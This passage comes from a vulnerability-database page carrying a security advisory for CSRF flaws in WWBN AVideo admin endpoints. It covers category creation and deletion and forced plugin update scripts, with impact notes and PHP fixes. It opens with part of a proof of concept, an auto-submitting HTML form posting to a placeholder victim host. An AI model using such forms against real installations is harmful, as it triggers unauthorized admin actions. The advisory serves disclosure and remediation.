evil-plugin-update.html --\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003cform id=f action=\"https://victim.example.com/objects/pluginRunUpdateScript.json.php\" method=\"POST\"\u003e\n  \u003cinput name=\"name\" value=\"Live\"\u003e\n  \u003cinput name=\"uuid\" value=\"anything\"\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027f\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nExpected: server logs `AVideoPlugin::updatePlugin name=(Live) uuid=(...)` and the plugin\u0027s `updateScript()` runs in the admin\u0027s session, with execution time extended to 300s.\n\n## Impact\n\n- **Integrity:** An attacker can silently cause the admin\u0027s browser to create, mutate, or delete rows in the `categories` table. Overwrite is especially damaging because field-level state (parent, privacy, allow_download, clean_name, iconClass) is changed without any UI feedback to the admin. Combined with any view that renders `description` without escaping, this becomes a vector for stored XSS propagation.\n- **Availability (partial):** `categoryDelete.json.php` is a pure destructive primitive that allows category rows to be removed one by one by iterating ids; there is no recovery flow.\n- **Privileged code execution trigger:** `pluginRunUpdateScript.json.php` lets the attacker force execution of any installed plugin\u0027s `updateScript()` method (with a 5-minute execution window) in the admin\u0027s context. When chained with other primitives that influence plugin state or the plugin\u0027s own update logic, this is a foothold for deeper compromise.\n- **Blast radius:** Each vulnerable endpoint requires only a single admin visit to any attacker-controlled page (XSS on a third-party site, a phishing link, a forum post with an auto-submitting form). No interaction beyond loading the page is required.\n\n## Recommended Fix\n\nAdd an explicit CSRF token check (and ideally an Origin check) to each endpoint, matching the pattern already used by `pluginSwitch.json.php` and `pluginRunDatabaseScript.json.php`.\n\n```php\n// objects/categoryAddNew.json.php (after line 18)\nif (!Category::canCreateCategory()) {\n    $obj-\u003emsg = __(\"Permission denied\");\n    die(json_encode($obj));\n}\nif (!isGlobalTokenValid()) {\n    http_response_code(403);\n    die(\u0027{\"error\":\"\u0027 . __(\u0027Invalid token\u0027) . \u0027\"}\u0027);\n}\nforbidIfIsUntrustedRequest();\n```\n\n```php\n// objects/categoryDelete.json.php (after line 12)\nif (!Category::canCreateCategory()) {\n    die(\u0027{\"error\":\"\u0027 . __(\"Permission denied\") . \u0027\"}\u0027);\n}\nif (!isGlobalTokenValid()) {\n    http_response_code(403);\n    die(\u0027{\"error\":\"\u0027 . __(\u0027Invalid token\u0027) . \u0027\"}\u0027);\n}\nforbidIfIsUntrustedRequest();\n```\n\n```php\n// objects/pluginRunUpdateScript.json.php (after line 11)\nif (!User::isAdmin()) {\n    forbiddenPage(\u0027Permission denied\u0027);\n}\nif (!isGlobalTokenValid()) {\n    http_response_code(403);\n    die(\u0027{\"error\":\"\u0027 . __(\u0027Invalid token\u0027) . \u0027\"}\u0027);\n}\nforbidIfIsUntrustedRequest();\n```\n\nThe long-term fix is to apply `forbidIfIsUntrustedRequest()` to every state-changing JSON endpoint via a shared include (e.g., a mandatory bootstrap file loaded by all `*.json.php` endpoints), so that future handlers cannot forget the check.",
  "id": "GHSA-ffw8-fwxp-h64w",
  "modified": "2026-04-14T23:12:39Z",
  "published": "2026-04-14T23:12:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WWBN AVideo has Multiple CSRF Vulnerabilities in Admin JSON Endpoints (Category CRUD, Plugin Update Script)"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40926 (GCVE-0-2026-40926)

FKIE_CVE-2026-40926

GHSA-FFW8-FWXP-H64W

Summary

Details

1. objects/categoryAddNew.json.php:18 — CSRF create/overwrite category

2. objects/categoryDelete.json.php:10 — CSRF delete category

3. objects/pluginRunUpdateScript.json.php:9 — CSRF forced plugin update

Why no global mitigation blocks this

PoC

PoC 1 — Create/overwrite category

PoC 2 — Delete category

PoC 3 — Force plugin updateScript()

Impact

Recommended Fix

Tags

Sightings

Nomenclature

1. `objects/categoryAddNew.json.php:18` — CSRF create/overwrite category

2. `objects/categoryDelete.json.php:10` — CSRF delete category

3. `objects/pluginRunUpdateScript.json.php:9` — CSRF forced plugin update